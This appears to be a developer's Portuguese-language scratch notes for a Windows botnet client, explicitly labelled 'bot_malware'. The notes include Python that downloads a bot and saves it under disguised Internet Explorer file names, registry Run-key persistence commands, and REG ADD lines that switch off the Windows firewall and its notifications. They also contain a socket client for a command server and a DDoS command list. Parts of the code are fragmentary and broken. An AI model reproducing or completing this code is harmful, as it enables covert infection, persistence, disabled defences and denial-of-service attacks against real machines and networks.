 bot_file = open('C:\Program Files\Internet Explorer\ieuninstall.exe', 'w')
      bot_file.write(bot_dow.content)
      bot_file.close()
      import getpass
getpass.getuser()
'kostya'

bot_inspath = str('C:\\Users\\'+User+'\\AppData\\Roaming\\iexplore.exe')
bot_inspath = str('C:\Users\')

================================================================

 1. Acesse o regedit:
Menu Iniciar > Executar > regedit [Digite e aperte Enter].
 2. Ao abrir o regedit percorra o seguinte caminho:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 3. Crie um novo "valor de sequência" (String Value) com o nome desejado, clique duas vezes nele e dê o caminho do programa.

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v teste /t REG_SZ /d "\"C:/Program Files/Internet Explorer/ieuninstall.exe"\" /f
===============================================================

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile

type= REG_DWORD
chaves= todas igual a 0 
names = EnableFirewall, DoNotAllowExceptions, DisableNotifications = 1 # tem que ser executado como admim 
// comandos

#REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v EnableFirewall /t REG_DWORD /d 0 /f

#REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v DoNotAllowExceptions /t REG_DWORD /d 0 /f

#REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v DisableNotifications /t REG_DWORD /d 1 /f

================================================================



FAZER TUDO PASSAR POR HTTPS *******










'''
  def comando(comando):
    print (str(comando), "executado com sucesso ")


  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("192.168.0.3", 9878))

  while True:
    data = s.recv(512)
    if data != "":
      comando(str(data))
      exit()
    else:
      pass



  dic = {
    'Command_Bot.alive{False}'
    'Command_Bot.ddos{"192.168.0.1", 80}': 'Simple ddos',
    'Command_Bot.Addos{"192.168.0.1", 80, 5}': 'Advanced ddos',
    '...': '...'  
    }

  o resto noix adiciona depois.

'''










funcoes bot_malware:


def Download_file(File_Url, Path):

  file_name = File_Url.split('/')
  file_name = str(file_name[len(file_name) -1])
  file_local = str(Path + file_name)

  get_file = requests.get(File_Url)

  if(get_file.status_code == 200):
    try:

      down_file = open(file_local, 'w')
      down_file.write(get_file.content)
      down_file.close()

    except:
      pass#Depois fazer tratamentos de erros no codigo 

  else:
    pass #Depois fazer tratamentos de erros no codigo 